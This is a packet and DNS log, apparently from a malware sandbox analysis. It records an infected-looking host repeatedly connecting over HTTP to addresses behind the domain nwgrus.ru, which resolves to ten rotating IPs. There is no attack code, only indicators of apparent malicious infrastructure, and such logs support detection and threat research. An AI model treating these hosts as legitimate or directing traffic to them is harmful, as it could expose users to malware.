                                                                                      Oct 1, 2024 15:19:18.037094116 CEST4976680192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:18.041821003 CEST804976678.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:22.185187101 CEST4976780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:22.190233946 CEST804976778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:22.190331936 CEST4976780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:22.190469027 CEST4976780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:22.190493107 CEST4976780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:22.195411921 CEST804976778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:22.195444107 CEST804976778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:23.665653944 CEST804976778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:23.665702105 CEST804976778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:23.665713072 CEST804976778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:23.665740013 CEST804976778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:23.665760994 CEST4976780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:23.665800095 CEST4976780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:23.665956974 CEST4976780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:23.671545029 CEST804976778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:28.838094950 CEST4976880192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:28.939483881 CEST804976878.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:28.939600945 CEST4976880192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:28.939738989 CEST4976880192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:28.939748049 CEST4976880192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:28.944602013 CEST804976878.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:28.944713116 CEST804976878.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:30.039554119 CEST804976878.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:30.039614916 CEST804976878.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:30.039822102 CEST4976880192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:30.039942026 CEST4976880192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:30.044997931 CEST804976878.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:34.498941898 CEST4976980192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:34.503876925 CEST804976978.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:34.503994942 CEST4976980192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:34.504096031 CEST4976980192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:34.504173040 CEST4976980192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:34.508874893 CEST804976978.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:34.509087086 CEST804976978.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:35.601290941 CEST804976978.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:35.601697922 CEST804976978.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:35.601803064 CEST4976980192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:35.602581978 CEST4976980192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:35.607872963 CEST804976978.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:41.185395956 CEST4977080192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:41.190818071 CEST804977078.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:41.190916061 CEST4977080192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:41.191082954 CEST4977080192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:41.191118002 CEST4977080192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:41.196511984 CEST804977078.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:41.196542025 CEST804977078.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:42.320750952 CEST804977078.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:42.320799112 CEST804977078.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:42.320909023 CEST4977080192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:42.321075916 CEST4977080192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:42.325965881 CEST804977078.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:46.690525055 CEST4977180192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:46.695473909 CEST804977178.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:46.695559025 CEST4977180192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:46.695696115 CEST4977180192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:46.695724010 CEST4977180192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:46.700422049 CEST804977178.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:46.700459003 CEST804977178.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:47.790616989 CEST804977178.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:47.790965080 CEST804977178.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:47.791065931 CEST4977180192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:47.791096926 CEST4977180192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:19:47.803268909 CEST804977178.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:19:55.285552979 CEST4977280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:19:55.290549040 CEST8049772187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:19:55.290637016 CEST4977280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:19:55.290777922 CEST4977280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:19:55.290815115 CEST4977280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:19:55.295609951 CEST8049772187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:19:55.295857906 CEST8049772187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:19:56.389751911 CEST8049772187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:19:56.389815092 CEST8049772187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:19:56.389825106 CEST8049772187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:19:56.389866114 CEST4977280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:19:56.389914036 CEST4977280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:19:56.390023947 CEST4977280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:19:56.396209002 CEST8049772187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:01.055428028 CEST4977380192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:01.061125040 CEST8049773187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:01.061896086 CEST4977380192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:01.062087059 CEST4977380192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:01.062105894 CEST4977380192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:01.068075895 CEST8049773187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:01.068578005 CEST8049773187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:02.020612955 CEST8049773187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:02.025424004 CEST8049773187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:02.025492907 CEST4977380192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:02.025544882 CEST4977380192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:02.032139063 CEST8049773187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:06.357049942 CEST4977480192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:06.362009048 CEST8049774187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:06.362175941 CEST4977480192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:06.362241030 CEST4977480192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:06.362256050 CEST4977480192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:06.367302895 CEST8049774187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:06.367356062 CEST8049774187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:07.324738026 CEST8049774187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:07.324940920 CEST8049774187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:07.324997902 CEST4977480192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:07.325037956 CEST4977480192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:07.329893112 CEST8049774187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:12.385631084 CEST4977580192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:12.457861900 CEST8049775187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:12.457947016 CEST4977580192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:12.458080053 CEST4977580192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:12.458101034 CEST4977580192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:12.463021994 CEST8049775187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:12.463639975 CEST8049775187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:13.530782938 CEST8049775187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:13.530905962 CEST8049775187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:13.530915976 CEST8049775187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:13.530972004 CEST4977580192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:13.531141996 CEST4977580192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:13.535896063 CEST8049775187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:17.892683983 CEST4977680192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:17.967000961 CEST8049776187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:17.967088938 CEST4977680192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:17.967247009 CEST4977680192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:17.967266083 CEST4977680192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:17.972001076 CEST8049776187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:17.972141981 CEST8049776187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:19.523677111 CEST8049776187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:19.523699045 CEST8049776187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:19.523709059 CEST8049776187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:19.523772001 CEST8049776187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:19.524008989 CEST4977680192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:19.524116039 CEST4977680192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:19.524116039 CEST4977680192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:19.528892040 CEST8049776187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:24.676763058 CEST4977780192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:24.681968927 CEST8049777187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:24.682076931 CEST4977780192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:24.682240009 CEST4977780192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:24.682265997 CEST4977780192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:24.687267065 CEST8049777187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:24.687525988 CEST8049777187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:25.647753954 CEST8049777187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:25.648049116 CEST8049777187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:25.648094893 CEST4977780192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:25.650413036 CEST4977780192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:25.655793905 CEST8049777187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:30.552651882 CEST4977880192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:30.557573080 CEST8049778187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:30.557800055 CEST4977880192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:30.557919025 CEST4977880192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:30.557948112 CEST4977880192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:30.562913895 CEST8049778187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:30.563182116 CEST8049778187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:31.521358967 CEST8049778187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:31.521388054 CEST8049778187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:31.521429062 CEST4977880192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:31.521555901 CEST4977880192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:31.526273012 CEST8049778187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:35.179691076 CEST4977980192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:35.217693090 CEST8049779187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:35.217789888 CEST4977980192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:35.217917919 CEST4977980192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:35.217932940 CEST4977980192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:35.222702026 CEST8049779187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:35.222883940 CEST8049779187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:36.199208021 CEST8049779187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:36.199249029 CEST8049779187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:36.199335098 CEST4977980192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:36.199521065 CEST4977980192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:36.204262018 CEST8049779187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:40.140780926 CEST4978080192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:40.145731926 CEST8049780187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:40.145817041 CEST4978080192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:40.145922899 CEST4978080192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:40.145936966 CEST4978080192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:40.150835991 CEST8049780187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:40.150845051 CEST8049780187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:41.110836983 CEST8049780187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:41.110863924 CEST8049780187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:41.110917091 CEST4978080192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:41.111092091 CEST4978080192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:41.115873098 CEST8049780187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:46.084177017 CEST4978180192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:46.089056969 CEST8049781187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:46.089241028 CEST4978180192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:46.089329004 CEST4978180192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:46.089354038 CEST4978180192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:46.094125986 CEST8049781187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:46.094484091 CEST8049781187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:47.770889997 CEST8049781187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:47.770909071 CEST8049781187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:47.770917892 CEST8049781187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:47.770977020 CEST4978180192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:47.771024942 CEST4978180192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:47.771155119 CEST4978180192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:47.771214008 CEST8049781187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:47.771256924 CEST4978180192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:47.771483898 CEST8049781187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:47.771524906 CEST4978180192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:47.775875092 CEST8049781187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:52.899945974 CEST4978280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:52.904849052 CEST8049782187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:52.904911041 CEST4978280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:52.905045986 CEST4978280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:52.905060053 CEST4978280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:52.909779072 CEST8049782187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:52.909982920 CEST8049782187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:54.025105953 CEST8049782187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:54.025141954 CEST8049782187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:54.025167942 CEST8049782187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:54.025223017 CEST4978280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:54.025264978 CEST4978280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:54.025444984 CEST4978280192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:54.030210018 CEST8049782187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:58.529503107 CEST4978380192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:58.534431934 CEST8049783187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:58.534496069 CEST4978380192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:58.534616947 CEST4978380192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:58.534627914 CEST4978380192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:58.539578915 CEST8049783187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:58.539886951 CEST8049783187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:59.510467052 CEST8049783187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:59.510586977 CEST8049783187.131.253.169192.168.2.4
                                                                                      Oct 1, 2024 15:20:59.510648966 CEST4978380192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:59.510708094 CEST4978380192.168.2.4187.131.253.169
                                                                                      Oct 1, 2024 15:20:59.515568972 CEST8049783187.131.253.169192.168.2.4
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 1, 2024 15:17:20.132869005 CEST5872553192.168.2.41.1.1.1
                                                                                      Oct 1, 2024 15:17:21.118122101 CEST5872553192.168.2.41.1.1.1
                                                                                      Oct 1, 2024 15:17:22.214936018 CEST5872553192.168.2.41.1.1.1
                                                                                      Oct 1, 2024 15:17:22.421433926 CEST53587251.1.1.1192.168.2.4
                                                                                      Oct 1, 2024 15:17:22.422081947 CEST53587251.1.1.1192.168.2.4
                                                                                      Oct 1, 2024 15:17:22.422563076 CEST53587251.1.1.1192.168.2.4
                                                                                      Oct 1, 2024 15:19:52.888026953 CEST5802153192.168.2.41.1.1.1
                                                                                      Oct 1, 2024 15:19:53.883910894 CEST5802153192.168.2.41.1.1.1
                                                                                      Oct 1, 2024 15:19:54.899472952 CEST5802153192.168.2.41.1.1.1
                                                                                      Oct 1, 2024 15:19:55.284605980 CEST53580211.1.1.1192.168.2.4
                                                                                      Oct 1, 2024 15:19:55.284629107 CEST53580211.1.1.1192.168.2.4
                                                                                      Oct 1, 2024 15:19:55.287265062 CEST53580211.1.1.1192.168.2.4
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Oct 1, 2024 15:17:20.132869005 CEST192.168.2.41.1.1.10x63eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:21.118122101 CEST192.168.2.41.1.1.10x63eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.214936018 CEST192.168.2.41.1.1.10x63eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:52.888026953 CEST192.168.2.41.1.1.10x8010Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:53.883910894 CEST192.168.2.41.1.1.10x8010Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:54.899472952 CEST192.168.2.41.1.1.10x8010Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Oct 1, 2024 15:17:22.421433926 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.421433926 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.421433926 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.421433926 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru179.52.87.163A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.421433926 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.421433926 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru190.147.2.86A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.421433926 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.421433926 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.421433926 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.421433926 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422081947 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422081947 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422081947 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422081947 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru179.52.87.163A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422081947 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422081947 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru190.147.2.86A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422081947 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422081947 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422081947 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422081947 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422563076 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422563076 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422563076 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422563076 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru179.52.87.163A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422563076 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422563076 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru190.147.2.86A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422563076 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422563076 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422563076 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:17:22.422563076 CEST1.1.1.1192.168.2.40x63eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284605980 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284605980 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284605980 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284605980 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284605980 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284605980 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284605980 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru179.52.87.163A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284605980 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284605980 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru190.147.2.86A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284605980 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284629107 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
